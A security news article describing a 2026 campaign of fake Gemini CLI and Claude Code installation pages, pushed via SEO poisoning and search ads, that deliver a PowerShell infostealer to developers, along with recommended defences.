Fake installation pages impersonating Google’s Gemini CLI and Anthropic’s Claude Code are being pushed through search manipulation campaigns that place malicious domains above legitimate results, exposing developers and enterprises to credential theft, cryptocurrency wallet compromise and follow-on network intrusion.The campaign, identified across activity beginning in early March 2026, uses SEO poisoning and sponsored search placement to capture users looking for AI coding tools. Developers searching for Gemini CLI or Claude Code installation instructions are directed to lookalike pages that closely mimic official documentation. The pages then prompt users to copy and run installation commands that appear routine but instead fetch malicious PowerShell scripts from attacker-controlled infrastructure.
The operation reflects a wider shift in cybercrime tactics as AI coding assistants move deeper into corporate software development workflows. Gemini CLI, released as an open-source command-line AI agent, and Claude Code, Anthropic’s terminal-based coding assistant, are attractive lures because users expect to install them through command-line instructions. Attackers are exploiting that familiarity by replacing legitimate one-line commands with malware delivery instructions.
Security teams tracking the campaign found that Windows systems were a primary target. The payload executes largely in memory through PowerShell, reducing the forensic footprint on disk. Once active, it fingerprints the host, disables parts of PowerShell event logging, checks for analysis environments and gathers a broad set of sensitive material before encrypting and sending the stolen data to command-and-control servers.
The data targeted by the infostealer goes well beyond browser passwords. The malware is designed to collect OAuth tokens, CI/CD credentials, collaboration platform authentication keys, corporate VPN details, cloud access material, browser cookies, session tokens, sensitive files and cryptocurrency wallet data. Such access can give attackers a route from a single developer workstation into source code repositories, deployment pipelines and wider enterprise systems.
The campaign also contains a loader function, giving operators the ability to run additional PowerShell commands on selected compromised machines. That capability turns what first appears to be a credential theft operation into a potential entry point for hands-on intrusion, lateral movement and targeted exploitation of higher-value victims.
Investigators have linked the activity to financially motivated e-crime operators rather than state-backed groups. The structure of the campaign points to scalable credential harvesting, but the focus on developer systems raises the potential impact. Developers often hold privileged access to codebases, package registries, production systems, cloud consoles and internal collaboration tools, making them valuable targets for attackers seeking both data theft and supply-chain access.
The Gemini-themed activity used domains designed to resemble legitimate installation destinations, including pages that presented what looked like normal setup instructions. In some cases, the malicious command retrieved an installer script from a separate attacker domain, adding another layer to the infection chain. Claude Code-themed pages followed a similar pattern, presenting cloned documentation or install guides and redirecting users back to genuine pages after interaction to reduce suspicion.
A related wave of activity earlier this year used cloned software pages and malicious ads to target users searching for developer and utility tools including VPN clients, password managers, secure file-transfer applications and note-taking software. By April, the same broader technique had moved more directly towards AI development tools, reflecting the speed with which attackers adapt to search demand and developer trends.
The attraction of this method lies in its simplicity. Unlike email phishing, the victim initiates the interaction by searching for software they already intend to install. Search ads and poisoned rankings then provide the attacker with a credible delivery route that bypasses many email security controls. The copy-and-paste installation habit common in developer ecosystems further lowers resistance, especially when documentation pages appear visually authentic.
The risk is heightened by the rapid adoption of agentic coding tools in enterprises. AI assistants are being used to read repositories, generate code, submit pull requests, manage tests and interact with developer tooling. As these tools become embedded in workflows, attackers are increasingly treating their brands, installation pages and package ecosystems as high-value infrastructure for social engineering.
Defensive measures centre on controlling installation sources, restricting unverified script execution and monitoring for suspicious PowerShell behaviour. Organisations are being urged to require developers to verify domains before running installation commands, prefer package managers and repositories with authenticated provenance, block known malicious domains, inspect command-line activity and rotate credentials after suspected exposure.
Topics
Technology